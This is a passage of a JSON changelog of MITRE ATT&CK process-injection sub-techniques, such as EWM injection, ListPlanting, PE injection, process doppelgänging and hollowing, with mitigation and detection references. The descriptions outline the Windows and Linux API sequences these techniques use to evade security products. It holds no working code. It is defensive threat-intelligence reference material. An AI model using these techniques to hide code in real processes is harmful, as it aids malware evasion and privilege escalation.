                    "version_change": "1.4 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0389: Behavioral Detection of DLL Injection via Windows API"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-14 17:18:32.126000+00:00",
                    "modified": "2026-04-15 22:27:04.367000+00:00",
                    "name": "Extra Window Memory Injection",
                    "description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process\u2019s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process\u2019s EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as <code>WriteProcessMemory</code> and <code>CreateRemoteThread</code>.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.  (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1055/011",
                            "external_id": "T1055.011"
                        },
                        {
                            "source_name": "Elastic Process Injection July 2017",
                            "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
                            "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
                        },
                        {
                            "source_name": "MalwareTech Power Loader Aug 2013",
                            "description": "MalwareTech. (2013, August 13). PowerLoader Injection \u2013 Something truly amazing. Retrieved December 16, 2017.",
                            "url": "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html"
                        },
                        {
                            "source_name": "WeLiveSecurity Gapz and Redyms Mar 2013",
                            "description": "Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.",
                            "url": "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/"
                        },
                        {
                            "source_name": "Microsoft Window Classes",
                            "description": "Microsoft. (n.d.). About Window Classes. Retrieved December 16, 2017.",
                            "url": "https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx"
                        },
                        {
                            "source_name": "Microsoft GetWindowLong function",
                            "description": "Microsoft. (n.d.). GetWindowLong function. Retrieved December 16, 2017.",
                            "url": "https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx"
                        },
                        {
                            "source_name": "Microsoft SetWindowLong function",
                            "description": "Microsoft. (n.d.). SetWindowLong function. Retrieved December 16, 2017.",
                            "url": "https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:27:04.367000+00:00\", \"old_value\": \"2025-10-24 17:48:19.059000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}, \"iterable_item_removed\": {\"root['external_references'][7]\": {\"source_name\": \"Microsoft SendNotifyMessage function\", \"description\": \"Microsoft. (n.d.). SendNotifyMessage function. Retrieved December 16, 2017.\", \"url\": \"https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0217: Detection Strategy for Extra Window Memory (EWM) Injection on Windows"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-11-22 15:02:15.190000+00:00",
                    "modified": "2026-04-15 22:28:31.388000+00:00",
                    "name": "ListPlanting",
                    "description": "Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process.(Citation: Hexacorn Listplanting) Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.\n\nList-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a form of message-passing \"shatter attack\") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process\u2019 memory space, which can be performed various ways including by directly obtaining a handle to the <code>SysListView32</code> child of the victim process window (via Windows API calls such as <code>FindWindow</code> and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.\n\nSome variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored <code>WriteProcessMemory</code> function. For example, an adversary can use the <code>PostMessage</code> and/or <code>SendMessage</code> API functions to send <code>LVM_SETITEMPOSITION</code> and <code>LVM_GETITEMPOSITION</code> messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020) \n\nFinally, the payload is triggered by sending the <code>LVM_SORTITEMS</code> message to the <code>SysListView32</code> child of the process window, with the payload within the newly allocated buffer passed and executed as the <code>ListView_SortItems</code> callback.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1055/015",
                            "external_id": "T1055.015"
                        },
                        {
                            "source_name": "Hexacorn Listplanting",
                            "description": "Hexacorn. (2019, April 25). Listplanting \u2013 yet another code injection trick. Retrieved August 14, 2024.",
                            "url": "https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/"
                        },
                        {
                            "source_name": "ESET InvisiMole June 2020",
                            "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.",
                            "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"
                        },
                        {
                            "source_name": "Microsoft List View Controls",
                            "description": "Microsoft. (2021, May 25). About List-View Controls. Retrieved January 4, 2022.",
                            "url": "https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview"
                        },
                        {
                            "source_name": "Modexp Windows Process Injection",
                            "description": "odzhan. (2019, April 25). Windows Process Injection: WordWarping, Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline. Retrieved November 15, 2021.",
                            "url": "https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "ESET"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:28:31.388000+00:00\", \"old_value\": \"2025-10-24 17:49:33.701000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0331: Detection Strategy for ListPlanting Injection on Windows"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-14 01:27:31.344000+00:00",
                    "modified": "2026-04-15 22:28:35.452000+00:00",
                    "name": "Portable Executable Injection",
                    "description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1055/002",
                            "external_id": "T1055.002"
                        },
                        {
                            "source_name": "Elastic Process Injection July 2017",
                            "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
                            "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:28:35.452000+00:00\", \"old_value\": \"2025-10-24 17:49:01.839000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0106: Behavioral Detection of PE Injection via Remote Memory Mapping"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-14 01:34:10.588000+00:00",
                    "modified": "2026-04-15 22:28:52.682000+00:00",
                    "name": "Proc Memory",
                    "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (<code>/proc/[pid]</code>) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes\u2019 stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes\u2019 memory map within <code>/proc/[pid]/maps</code> can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1055/009",
                            "external_id": "T1055.009"
                        },
                        {
                            "source_name": "DD Man",
                            "description": "Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved February 21, 2020.",
                            "url": "http://man7.org/linux/man-pages/man1/dd.1.html"
                        },
                        {
                            "source_name": "GDS Linux Injection",
                            "description": "McNamara, R. (2017, September 5). Linux Based Inter-Process Code Injection Without Ptrace(2). Retrieved February 21, 2020.",
                            "url": "https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html"
                        },
                        {
                            "source_name": "Uninformed Needle",
                            "description": "skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.",
                            "url": "http://hick.org/code/skape/papers/needle.txt"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:28:52.682000+00:00\", \"old_value\": \"2025-10-24 17:49:25.806000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0541: Detection Strategy for /proc Memory Injection on Linux"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-14 17:19:50.978000+00:00",
                    "modified": "2026-04-15 22:28:53.747000+00:00",
                    "name": "Process Doppelg\u00e4nging",
                    "description": "Adversaries may inject malicious code into process via process doppelg\u00e4nging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelg\u00e4nging is a method of executing arbitrary code in the address space of a separate live process. \n\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017)\n\nAdversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelg\u00e4nging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelg\u00e4nging's use of TxF also avoids the use of highly-monitored API functions such as <code>NtUnmapViewOfSection</code>, <code>VirtualProtectEx</code>, and <code>SetThreadContext</code>. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017)\n\nProcess Doppelg\u00e4nging is implemented in 4 steps (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017):\n\n* Transact \u2013 Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load \u2013 Create a shared section of memory and load the malicious executable.\n* Rollback \u2013 Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate \u2013 Create a process from the tainted section of memory and initiate execution.\n\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelg\u00e4nging may evade detection from security products since the execution is masked under a legitimate process. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1055/013",
                            "external_id": "T1055.013"
                        },
                        {
                            "source_name": "BlackHat Process Doppelg\u00e4nging Dec 2017",
                            "description": "Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: Process Doppelg\u00e4nging. Retrieved December 20, 2017.",
                            "url": "https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf"
                        },
                        {
                            "source_name": "Microsoft Basic TxF Concepts",
                            "description": "Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, 2017.",
                            "url": "https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx"
                        },
                        {
                            "source_name": "Microsoft TxF",
                            "description": "Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December 20, 2017.",
                            "url": "https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx"
                        },
                        {
                            "source_name": "Microsoft Where to use TxF",
                            "description": "Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved December 20, 2017.",
                            "url": "https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:28:53.747000+00:00\", \"old_value\": \"2025-10-24 17:48:56.422000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}, \"iterable_item_removed\": {\"root['external_references'][5]\": {\"source_name\": \"hasherezade Process Doppelg\\u00e4nging Dec 2017\", \"description\": \"hasherezade. (2017, December 18). Process Doppelg\\u00e4nging \\u2013 a new way to impersonate a process. Retrieved December 20, 2017.\", \"url\": \"https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/\"}, \"root['external_references'][6]\": {\"source_name\": \"Microsoft PsSetCreateProcessNotifyRoutine routine\", \"description\": \"Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved December 20, 2017.\", \"url\": \"https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0544: Detection Strategy for Process Doppelg\u00e4nging on Windows"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-14 17:21:54.470000+00:00",
                    "modified": "2026-04-15 22:30:23.429000+00:00",
                    "name": "Process Hollowing",
                    "description": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  \n\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as <code>CreateProcess</code>, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as <code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code>  before being written to, realigned to the injected code, and resumed via <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1055/012",
                            "external_id": "T1055.012"
                        },
                        {
                            "source_name": "Elastic Process Injection July 2017",
                            "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
                            "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
                        },
                        {
                            "source_name": "Leitch Hollowing",
                            "description": "Leitch, J. (n.d.). Process Hollowing. Retrieved September 12, 2024.",
                            "url": "https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:30:23.429000+00:00\", \"old_value\": \"2025-10-24 17:49:14.559000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.4\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Nviso Spoof Command Line 2020\", \"description\": \"Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.\", \"url\": \"https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/\"}, \"root['external_references'][4]\": {\"source_name\": \"Mandiant Endpoint Evading 2019\", \"description\": \"Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.\", \"url\": \"https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0382: Detection Strategy for Process Hollowing on Windows"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-14 01:33:19.065000+00:00",
                    "modified": "2026-04-15 22:30:27.359000+00:00",
                    "name": "Ptrace System Calls",
